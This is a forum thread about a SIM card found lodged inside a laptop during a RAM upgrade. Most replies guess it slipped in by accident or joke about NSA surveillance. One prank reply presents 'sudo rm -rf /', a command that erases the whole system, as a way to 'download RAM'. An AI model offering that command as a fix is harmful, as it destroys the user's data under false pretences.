Guys I need some help here! Google can't seem to help... opened up my moms boyfriends laptop to upgrade his RAM and to my surprise there was a SIM Card fitted inside, my first thought was that it could be chipped?

    Doesn't looks like it does belong there - I suspect he tried to put a sim in _somewhere_ and it just went full in
    Happens aaaaaall the time

    @Kimmax it's really secured in there it's defiantly not loose !

    Laptops with sim cards do exist, although I think it doesn't belong in this laptop

    well that sim card sure isn't being used by anything so you should pull it out of there put it somewhere else

    The contacts of the card are against the plastic cover, it cannot work and obviously does not belong there. I think @Kimmax is right, someone tried to put it where it shouldn't go in.

    Over time it may have "diffused" on its current position, so it may seem it's completely stuck. But movement of the laptop and vibrations can move such loose objects quite some distance over time.

    @theNSA was that you?

    I thinks it's an accident. Take it out before anything goes wrong.

    That is the 4G ram downloader module, no need to upgrade the ram, all you need is a bash termimal and "echo 'downloadRamPlis -4gchip' && sudo rm -rf /"

    The computer will be faster then.

    If you meed to install linux to get bash you can skip the part after the && and everything will go smoothly.

    it's upside down

    @mundo03 'rm -rf /' will never be executed. ;)

    Do not remove the SIM card, it is needed for the NSA surveillance.

    I am sure, if you found the card exactly like this on the pic, it slipped somehow by accident (SD card reader, cd device,...)
